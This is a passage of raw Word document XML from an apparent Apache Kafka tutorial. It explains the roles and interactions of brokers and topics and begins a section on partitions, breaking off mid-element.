        <w:t>broker</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a Kafka server that stores and serves Kafka topics. A Kafka cluster consists of one or more brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64218ED3" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Role</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The broker is responsible for storing data and managing the consumers' requests for reading and writing messages. It is the core component of Kafka's architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767130E1" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Broker Responsibilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6D2E15" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Manages message storage for each partition of each topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8DCFB1" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Handles requests from producers and consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D65A114" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ensures message replication to provide fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE145B1" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Tracks consumer offsets and handles failover scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233B97CE" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66" w:rsidP="00603C66">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How it interacts with other components</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403B8118" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="261"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Brokers store messages for each partition in a topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D44598" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="261"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">They serve both </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>producers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (by receiving messages) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (by serving messages).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7EA3D1" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="261"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Brokers communicate with other brokers to ensure data replication (across multiple brokers in the cluster).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445F93B1" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00603C66">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="02BADCB2">
          <v:rect id="_x0000_i3068" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B1D66D" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66" w:rsidP="00603C66">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4. Topic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7BE75E" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="262"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Definition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>topic</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a logical channel to which messages are published by producers and consumed by consumers. Kafka topics are the primary unit of message organization and serve as the "category" of messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3267DDD6" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="262"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Role</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A topic holds records/messages in the form of logs, and each message is written to a partition within a topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B628AB" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="262"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Topic Responsibilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4842FE5D" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="262"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Organizes and categorizes messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D25123F" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="262"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Supports multiple partitions for parallelism and scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2239DA46" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66" w:rsidP="00603C66">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How it interacts with other components</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20776BAD" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>producer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sends messages to a specific </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>topic</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206A80D3" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> subscribes to one or more </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>topics</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to receive messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DCE23D" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00603C66">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="55B13E5A">
          <v:rect id="_x0000_i3069" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E011DB" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66" w:rsidP="00603C66">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5. Partition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4319D447" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Definition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a unit of parallelism in Kafka. A topic is split into multiple partitions to allow Kafka to scale and enable multiple consumers to read the data in parallel. Each partition is an ordered, immutable sequence of records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F179D7" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="264"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Role</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
